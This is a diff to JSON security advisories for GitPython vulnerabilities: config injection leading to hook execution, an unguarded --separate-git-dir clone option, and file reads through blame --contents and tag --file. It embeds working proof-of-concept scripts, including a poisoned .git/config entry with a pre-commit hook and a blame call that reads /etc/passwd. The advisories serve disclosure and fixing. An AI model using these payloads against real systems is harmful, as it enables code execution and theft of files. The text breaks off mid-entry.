False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-apm-CVE-2026-78677.json b/advisories/BREW-apm-CVE-2026-78677.json index a5e72b1e38c..75e3193274c 100644 --- a/advisories/BREW-apm-CVE-2026-78677.json +++ b/advisories/BREW-apm-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-78677", "published": "2026-09-04T08:44:32Z", - "modified": "2026-09-04T08:44:32Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,27 +46,56 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-apm-CVE-2026-78678.json b/advisories/BREW-apm-CVE-2026-78678.json index 38a0ee32389..35950279c7c 100644 --- a/advisories/BREW-apm-CVE-2026-78678.json +++ b/advisories/BREW-apm-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-78678", "published": "2026-09-04T08:44:32Z", - "modified": "2026-09-04T08:44:32Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,27 +46,40 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-apm-CVE-2026-78679.json b/advisories/BREW-apm-CVE-2026-78679.json new file mode 100644 index 00000000000..e6b4ab26170 --- /dev/null +++ b/advisories/BREW-apm-CVE-2026-78679.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-apm-CVE-2026-78679", + "published": "2026-09-10T18:52:52Z", + "modified": "2026-09-10T18:52:52Z", + "upstream": [ + "GHSA-3wxw-xv34-2frg", + "CVE-2026-78679", + "PYSEC-2026-3837" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "apm", + "purl": "pkg:brew/apm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.26.0" + }, + { + "fixed": "0.29.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.59", + "resource": "gitpython", + "resource_purl": "pkg:pypi/gitpython@3.1.62" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "gitpython", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", + "resource": "gitpython" + } + ] + }, + "summary": "GitPython: TagReference.create positional reference bypasses kwargs-only --file guard, enabling arbitrary file read (incomplete fix of 3af0c251)", + "details": "## Summary\n`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).\n\n## Root Cause\nThe fix `3af0c251` added `unsafe_git_tag_options = [\"--file\",\"-F\"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference=\"--file=\"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.\n\n## Impact\nArbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nfrom git import 